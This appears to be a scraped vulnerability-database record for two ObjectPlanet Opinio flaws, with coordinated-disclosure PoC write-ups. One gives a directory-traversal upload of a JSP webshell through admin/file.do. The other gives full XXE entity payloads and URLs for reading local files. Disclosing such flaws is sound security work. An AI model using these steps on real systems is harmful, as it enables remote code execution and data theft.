ObjectPlanet Opinio 7.13 Shell Upload

2021-07-30T00:00:00

Description

{"id": "PACKETSTORM:163709", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ObjectPlanet Opinio 7.13 Shell Upload", "description": "", "published": "2021-07-30T00:00:00", "modified": "2021-07-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/163709/ObjectPlanet-Opinio-7.13-Shell-Upload.html", "reporter": "Daniel Tan", "references": [], "cvelist": ["CVE-2020-26564", "CVE-2020-26806"], "immutableFields": [], "lastseen": "2021-07-30T17:28:37", "viewCount": 101, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-26564", "CVE-2020-26806"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163707"]}, {"type": "zdt", "idList": ["1337DAY-ID-36609", "1337DAY-ID-36611"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-26564", "CVE-2020-26806"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163707"]}, {"type": "zdt", "idList": ["1337DAY-ID-36609", "1337DAY-ID-36611"]}]}, "exploitation": null, "vulnersScore": 5.3}, "sourceHref": "https://packetstormsecurity.com/files/download/163709/opinion713-shell.txt", "sourceData": "`# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng \n# CVE: CVE-2020-26806 \n \n# Exploit Title: ObjectPlanet Opinio version 7.13 allows unrestricted file upload \n# Vendor Homepage: https://www.objectplanet.com/opinio/ \n# Software Link: https://www.objectplanet.com/opinio/ \n# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng \n# CVE: CVE-2020-26806 \n \n# Timeline \n- September 2020: Initial discovery \n- October 2020: Reported to ObjectPlanet \n- November 2020: Fix/patch provided by ObjectPlanet \n- July 2021: CVE-2020-26806 \n \n# 1. Introduction \nOpinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed. \n \n# 2. Vulnerability Details \nObjectPlanet Opinio before version 7.13 is vulnerable to unrestricted file uploads \n \n# 3. Proof of Concept \n \n### Unrestricted File Upload leading to RCE ### \n \nStep 1: \n \nURL: /opinio/admin/file.do \n \nOpinio allows an administrative user to edit local CSS files. This file editing function however does not validate if the HTTP POST parameters are tampered with. \n \nPost parameters to tamper with: \n- filePath \n- fileContent \n \nThe base directory can be guessed via the information under Setup >> Edit System Settings , this page on Opinio shows the local directory of where Opinio was installed to. \n \nThe file path can be tampered with for e.g. : /upload/css/common/../../../admin/shell.jsp \nThe fileContent value was tampered with a JSP webshell for this PoC and a webshell was acheieved \nFor our PoC, we could view the web.xml file using an XXE vulnerability CVE-2020-26564 and identify which JSP files were allowed be loaded and replaced the contents of that JSP file with the webshell code \n \nThis vulnerability was confirmed by ObjectPlanet Opinio in their patch notes which can be found at : https://www.objectplanet.com/opinio/changelog.html \n \n------------------------------------------------------- \n \n# 4. Remediation \nApply the latest fix/patch from objectplanet. \n \n# 5. Credits \nTimothy Tan (https://sg.linkedin.com/in/timtjh) \nKhor Yong Heng (https://www.linkedin.com/in/khor-yong-heng-66108a120/) \nYu EnHui (https://www.linkedin.com/in/enhui-yu-88691b15b/) \nDaniel Tan (https://www.linkedin.com/in/dantanjk/) \n`\n", "_state": {"dependencies": 1646042098}}

{"zdt": [{"lastseen": "2021-12-03T01:55:46", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-30T00:00:00", "type": "zdt", "title": "ObjectPlanet Opinio 7.13 Shell Upload Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26806", "CVE-2020-26564"], "modified": "2021-07-30T00:00:00", "id": "1337DAY-ID-36611", "href": "https://0day.today/exploit/description/36611", "sourceData": "# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng\n# CVE: CVE-2020-26806\n\n# Exploit Title: ObjectPlanet Opinio version 7.13 allows unrestricted file upload\n# Vendor Homepage: https://www.objectplanet.com/opinio/\n# Software Link: https://www.objectplanet.com/opinio/\n# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng\n# CVE: CVE-2020-26806\n\n# Timeline\n- September 2020: Initial discovery\n- October 2020: Reported to ObjectPlanet\n- November 2020: Fix/patch provided by ObjectPlanet\n- July 2021: CVE-2020-26806\n\n# 1. Introduction\nOpinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed.\n\n# 2. Vulnerability Details\nObjectPlanet Opinio before version 7.13 is vulnerable to unrestricted file uploads\n\n# 3. Proof of Concept\n\n### Unrestricted File Upload leading to RCE ###\n\nStep 1: \n\nURL: /opinio/admin/file.do\n\nOpinio allows an administrative user to edit local CSS files. This file editing function however does not validate if the HTTP POST parameters are tampered with.\n\nPost parameters to tamper with:\n- filePath\n- fileContent\n\nThe base directory can be guessed via the information under Setup >> Edit System Settings , this page on Opinio shows the local directory of where Opinio was installed to. \n\nThe file path can be tampered with for e.g. : /upload/css/common/../../../admin/shell.jsp\nThe fileContent value was tampered with a JSP webshell for this PoC and a webshell was acheieved \nFor our PoC, we could view the web.xml file using an XXE vulnerability CVE-2020-26564 and identify which JSP files were allowed be loaded and replaced the contents of that JSP file with the webshell code\n\nThis vulnerability was confirmed by ObjectPlanet Opinio in their patch notes which can be found at : https://www.objectplanet.com/opinio/changelog.html\n\n-------------------------------------------------------\n\n# 4. Remediation\nApply the latest fix/patch from objectplanet.\n\n# 5. Credits\nTimothy Tan (https://sg.linkedin.com/in/timtjh)\nKhor Yong Heng (https://www.linkedin.com/in/khor-yong-heng-66108a120/)\nYu EnHui (https://www.linkedin.com/in/enhui-yu-88691b15b/)\nDaniel Tan (https://www.linkedin.com/in/dantanjk/)\n", "sourceHref": "https://0day.today/exploit/36611", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:52:05", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-07-30T00:00:00", "type": "zdt", "title": "ObjectPlanet Opinio 7.13 / 7.14 XML Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26564"], "modified": "2021-07-30T00:00:00", "id": "1337DAY-ID-36609", "href": "https://0day.today/exploit/description/36609", "sourceData": "# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng\n# CVE: CVE-2020-26564\n\n# Exploit Title: ObjectPlanet Opinio version 7.13/7.14 allows XXE injection\n# Vendor Homepage: https://www.objectplanet.com/opinio/\n# Software Link: https://www.objectplanet.com/opinio/\n# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng\n# CVE: CVE-2020-26564\n\n# Timeline\n- September 2020: Initial discovery\n- October 2020: Reported to ObjectPlanet\n- November 2020: Fix/patch provided by ObjectPlanet\n- July 2021: CVE-2020-26564\n\n# 1. Introduction\nOpinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed.\n\n# 2. Vulnerability Details\nObjectPlanet Opinio before version 7.13 and 7.14 is vulnerable to XXE injection.\n\n# 3. Proof of Concept\n\n### XXE leading to local file disclosure ###\n\nStep 1: \n\nURL: /opinio/admin/file.do?action=viewEditFileResource&resourceType=6&resourcePatch=upload/css/common/blueSurvey.css\n\nOpinio allows an administrative user to edit local CSS files, this is used to change the contents of a CSS file to a dtd reference file for the XXE injection\nThe existing blueSurvey.css file was chosen for this PoC. Replace the contents of the file with: \n\n<!ENTITY all \"%start;%file;%end;\">\n\n-------------------------------------------------------\n\nStep 2: \n\nUtilize Opinios survey module and create a generic survey template. Export the template .xml file and add this snippet into the top of the .xml file:\n\n<!ENTITY % file SYSTEM \"file:////C:\\Users\\\">\n<!ENTITY % start \"<![CDATA[\">\n<!ENTITY % end \"]]>\">\n<!ENTITY % dtd SYSTEM\n\"file:////C:\\<BASE_DIRECTORY>\\opinio\\upload\\css\\common\\blueSurvey.css\">\n%dtd;\n\nEnsure the surveyIntro tag is inserted with the following payload (This will output the result in the\nsurveyIntro field):\n\n<surveyIntro>&all;</surveyIntro>\n\nThe base directory can be guessed via the information under Setup >> Edit System Settings , this page on Opinio shows the local directory of where Opinio was installed to. \n\nImport the modified .xml file to: \n/survey/admin/folderSurvey.do?action=viewImportSurvey['importFile']\n\n-------------------------------------------------------\n\nStep 3: \n\nThe C:\\Users\\ directory can be viewed at :\n/opinio/admin/preview.do?action=previewSurvey&surveyId=<SURVEY_ID>\n\n\nThis vulnerability was confirmed by ObjectPlanet Opinio in their patch notes which can be found at : https://www.objectplanet.com/opinio/changelog.html\n\n\n# 4. Remediation\nApply the latest fix/patch from objectplanet.\n\n# 5. Credits\nTimothy Tan (https://sg.linkedin.com/in/timtjh)\nKhor Yong Heng (https://www.linkedin.com/in/khor-yong-heng-66108a120/)\nYu EnHui (https://www.linkedin.com/in/enhui-yu-88691b15b/)\nDaniel Tan (https://www.linkedin.com/in/dantanjk/)\n", "sourceHref": "https://0day.today/exploit/36609", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2022-03-23T16:13:23", "description": "admin/file.do in ObjectPlanet Opinio before 7.15 allows Unrestricted File Upload of executable JSP files, resulting in remote code execution, because filePath can have directory traversal and fileContent can be valid JSP code.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-31T17:15:00", "type": "cve", "title": "CVE-2020-26806", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26806"], "modified": "2021-08-09T19:00:00", "cpe": [], "id": "CVE-2020-26806", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-26806", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T16:11:33", "description": "ObjectPlanet Opinio before 7.15 allows XXE attacks via three steps: modify a .css file to have <!ENTITY content, create a .xml file for a generic survey template (containing a link to this .css file), and import this .xml file at the survey/admin/folderSurvey.do?action=viewImportSurvey['importFile'] URI. The XXE can then be triggered at a admin/preview.do?action=previewSurvey&surveyId= URI.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-31T17:15:00", "type": "cve", "title": "CVE-2020-26564", "cwe": ["CWE-611"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26564"], "modified": "2021-08-09T18:58:00", "cpe": [], "id": "CVE-2020-26564", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-26564", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-07-30T17:20:29", "description": "", "cvss3": {}, "published": "2021-07-30T00:00:00", "type": "packetstorm", "title": "ObjectPlanet Opinio 7.13 / 7.14 XML Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-26564"], "modified": "2021-07-30T00:00:00", "id": "PACKETSTORM:163707", "href": "https://packetstormsecurity.com/files/163707/ObjectPlanet-Opinio-7.13-7.14-XML-Injection.html", "sourceData": "`# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng \n# CVE: CVE-2020-26564 \n \n# Exploit Title: ObjectPlanet Opinio version 7.13/7.14 allows XXE injection \n# Vendor Homepage: https://www.objectplanet.com/opinio/ \n# Software Link: https://www.objectplanet.com/opinio/ \n# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng \n# CVE: CVE-2020-26564 \n \n# Timeline \n- September 2020: Initial discovery \n- October 2020: Reported to ObjectPlanet \n- November 2020: Fix/patch provided by ObjectPlanet \n- July 2021: CVE-2020-26564 \n \n# 1. Introduction \nOpinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed. \n \n# 2. Vulnerability Details \nObjectPlanet Opinio before version 7.13 and 7.14 is vulnerable to XXE injection. \n \n# 3. Proof of Concept \n \n### XXE leading to local file disclosure ### \n \nStep 1: \n \nURL: /opinio/admin/file.do?action=viewEditFileResource&resourceType=6&resourcePatch=upload/css/common/blueSurvey.css \n \nOpinio allows an administrative user to edit local CSS files, this is used to change the contents of a CSS file to a dtd reference file for the XXE injection \nThe existing blueSurvey.css file was chosen for this PoC. Replace the contents of the file with: \n \n<!ENTITY all \"%start;%file;%end;\"> \n \n------------------------------------------------------- \n \nStep 2: \n \nUtilize Opinios survey module and create a generic survey template. Export the template .xml file and add this snippet into the top of the .xml file: \n \n<!ENTITY % file SYSTEM \"file:////C:\\Users\\\"> \n<!ENTITY % start \"<![CDATA[\"> \n<!ENTITY % end \"]]>\"> \n<!ENTITY % dtd SYSTEM \n\"file:////C:\\<BASE_DIRECTORY>\\opinio\\upload\\css\\common\\blueSurvey.css\"> \n%dtd; \n \nEnsure the surveyIntro tag is inserted with the following payload (This will output the result in the \nsurveyIntro field): \n \n<surveyIntro>&all;</surveyIntro> \n \nThe base directory can be guessed via the information under Setup >> Edit System Settings , this page on Opinio shows the local directory of where Opinio was installed to. \n \nImport the modified .xml file to: \n/survey/admin/folderSurvey.do?action=viewImportSurvey['importFile'] \n \n------------------------------------------------------- \n \nStep 3: \n \nThe C:\\Users\\ directory can be viewed at : \n/opinio/admin/preview.do?action=previewSurvey&surveyId=<SURVEY_ID> \n \n \nThis vulnerability was confirmed by ObjectPlanet Opinio in their patch notes which can be found at : https://www.objectplanet.com/opinio/changelog.html \n \n \n# 4. Remediation \nApply the latest fix/patch from objectplanet. \n \n# 5. Credits \nTimothy Tan (https://sg.linkedin.com/in/timtjh) \nKhor Yong Heng (https://www.linkedin.com/in/khor-yong-heng-66108a120/) \nYu EnHui (https://www.linkedin.com/in/enhui-yu-88691b15b/) \nDaniel Tan (https://www.linkedin.com/in/dantanjk/) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163707/opinio714-xml.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}

ObjectPlanet Opinio 7.13 Shell Upload

Description

Related